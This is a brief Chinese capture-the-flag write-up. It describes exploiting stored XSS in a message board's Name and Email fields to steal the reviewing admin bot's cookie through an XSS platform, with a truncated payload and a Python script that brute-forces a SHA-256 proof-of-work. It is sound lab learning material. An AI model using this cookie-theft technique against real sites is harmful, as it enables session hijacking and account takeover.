与admin
有关, 可以尝试http://1.117.6.207:65005/admin
, 显示Get out, HACKER! Only admin can see the flag!
, 说明需要一个admin的验证, 这里想到获取admin的cookie.
每条留言会自动查看, 可以使用XSS攻击, 很容易看出来Name和Email两栏有XSS漏洞, 可以使用">封闭input标签并插入一个script标签进行Cookie的获取. 这里我直接使用了一个XSS平台进行了payload构建, 可以自己搭服务器.
payload: ">
使用preview可以发现payload已被正常解析成了html语句, 后台也收到了cookie:
然后只需要暴力碰撞一下这个sha256即可发送至后台获取Admin的cookie.
碰撞代码的python源码:
import hashlib
def sha256(s):
return hashlib.sha256(s.encode('utf-8')).hexdigest()
if __name__ == "__main__":
def sha256Crack(token):
for i in range(10000000000):
# print(sha256(i))
a = sha256(f"{i:04d}")[:6]
print(f'\r{a}', end='', flush=True)
if a == token[:6]:
print()
return i
print()
return None
print(sha256Crack(str(input())))
拿到cookie就可以改cookie去/admin了, 直接打开就有flag辽